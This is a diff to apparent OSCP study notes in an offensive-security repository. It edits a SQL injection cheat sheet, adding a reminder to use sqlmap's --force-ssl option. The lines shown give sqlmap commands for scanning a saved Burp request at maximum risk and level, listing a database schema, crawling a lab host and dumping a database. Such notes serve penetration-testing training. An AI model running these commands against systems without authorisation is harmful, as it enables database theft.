ville87/offsec/OSCP/README.md

 ## SQL Injection
 SQLMap
-- Use saved request from burp: (-p is parameter, can be removed if you add * to the param in the request file)
+- Use saved request from burp: (-p is parameter, can be removed if you add * to the param in the request file, remember to use force-ssl param!)
   `sqlmap -r request.txt -p objectid --risk 3 --level 5`
 - Define the target DBMS and run the request through local proxy (e.g. burp).
 Show the schema of the DB:
-  `sqlmap --proxy http://localhost:8080 -r request --dbms="Microsoft SQL Server 2017" --schema`
+  `sqlmap --proxy http://localhost:8080 -r request --dbms="Microsoft SQL Server 2017" --schema --force-ssl`
 - SQLMap Crawl:
   `sqlmap -u http://10.10.10.10 --crawl=1`
 - SQLMap Dump DB: